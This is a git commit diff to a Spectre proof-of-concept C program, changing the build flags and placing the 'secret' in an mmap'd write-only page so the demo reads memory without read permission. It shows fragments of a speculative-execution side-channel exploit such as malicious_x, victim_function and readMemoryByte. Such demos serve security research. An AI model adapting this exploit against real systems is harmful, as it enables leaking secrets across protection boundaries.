stdin

stdin

commit 1bc56614b1f9e63cb5509f43032b157f450e0f57 (HEAD -> ljr)
Author: Luke Dashjr <luke-jr+git@utopios.org>
Date:   Sun Feb 25 20:00:43 2018 +0000

    Actually deny read access to victim

diff --git a/Makefile b/Makefile
index ae71d3f..9c63da3 100644
--- a/Makefile
+++ b/Makefile
@@ -1,4 +1,4 @@
-CFLAGS = -std=c99
+CFLAGS = -std=gnu99
 
 PROGRAM = spectre.out
 SOURCE  = Source.c
diff --git a/Source.c b/Source.c
index 1526c49..6d7e90a 100644
--- a/Source.c
+++ b/Source.c
@@ -1,6 +1,7 @@
 #include <stdio.h>
 #include <stdint.h>
 #include <string.h>
+#include <sys/mman.h>
 #ifdef _MSC_VER
 #include <intrin.h> /* for rdtscp and clflush */
 #pragma optimize("gt", on)
@@ -22,7 +23,7 @@ uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
 uint8_t unused2[64];
 uint8_t array2[256 * 512];
 
-char* secret = "The Magic Words are Squeamish Ossifrage.";
+const char* secret = "The Magic Words are Squeamish Ossifrage.";
 
 uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
 
@@ -114,9 +115,13 @@ void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
 
 int main(int argc, const char* * argv)
 {
-	printf("Putting '%s' in memory, address %p\n", secret, (void *)(secret));
-	size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
-	int score[2], len = strlen(secret);
+	int len = strlen(secret);
+	char * const victim = mmap(NULL, len + 1, PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+	strcpy(victim, secret);
+	
+	printf("Putting '%s' in memory, address %p\n", secret, (void *)(victim));
+	size_t malicious_x = (size_t)(victim - (char *)array1); /* default for malicious_x */
+	int score[2];
 	uint8_t value[2];
 
 	for (size_t i = 0; i < sizeof(array2); i++)